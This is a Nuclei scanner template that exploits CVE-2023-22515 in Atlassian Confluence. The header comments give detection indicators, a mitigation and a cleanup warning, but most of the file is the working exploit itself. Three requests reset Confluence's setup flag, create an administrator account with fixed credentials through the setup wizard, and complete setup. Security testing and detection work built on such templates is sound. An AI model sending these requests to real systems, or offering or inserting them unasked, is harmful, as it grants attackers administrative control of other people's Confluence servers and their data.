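# Nuclei template for CVE-2023-22515 (Atlassian Confluence).
#
# The three requests below are state-changing, not a passive version check:
# on a vulnerable instance they leave behind an administrator account with
# the credentials from the step-2 body, which must be removed after any run
# against an instance you operate.
#
# Defender view (all indicators taken from the requests in this file):
#   - access-log entries whose query string contains
#     `bootstrapStatusProvider.applicationConfig.setupComplete=false`
#   - POSTs to `/setup/setupadministrator.action` or
#     `/setup/finishsetup.action` on an instance that finished setup long ago
#   - administrator accounts nobody on the team created
# Mitigation: upgrade to a fixed release per the vendor advisory for this
# CVE and, until then, block external access to `/setup/*`.
id: CVE-2023-22515

info:
  name: Atlassian Confluence Privilege Escalation Exploit
  author: 0xj3seer
  severity: critical
  # `intrusive` marks the template as one that modifies the target, so it can
  # be filtered by tag and kept out of routine scans.
  tags: cve,cve2023,confluence,intrusive

requests:
  # Step 1: asks the application, via the query string, to set its
  # setupComplete flag to false.
  # NOTE(review): every matcher in this file checks only for HTTP 200. A host
  # that answers 200 for arbitrary paths (soft 404, login redirect page) will
  # be reported as vulnerable; confirm any hit against the instance's version
  # and its user directory before acting on it.
  - method: GET
    path:
      - "{{BaseURL}}/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    headers:
      X-Atlassian-Token: no-check
    matchers:
      - type: status
        status:
          - 200

  # Step 2: submits the setup wizard's "create administrator" form.
  # The `[email protected]` text is an e-mail obfuscation placeholder left by
  # the page this listing was extracted from, not the original value; it is
  # kept verbatim here.
  - method: POST
    path:
      - "{{BaseURL}}/setup/setupadministrator.action"
    body: 'username=bro&fullName=bro&[email protected]&password=bro&confirm=bro&setup-next-button=Next'
    headers:
      Content-Type: application/x-www-form-urlencoded
      X-Atlassian-Token: no-check
    matchers:
      - type: status
        status:
          - 200

  # Step 3: posts an empty body to the wizard's final step.
  - method: POST
    path:
      - "{{BaseURL}}/setup/finishsetup.action"
    body: ''
    headers:
      X-Atlassian-Token: no-check
    matchers:
      - type: status
        status:
          - 200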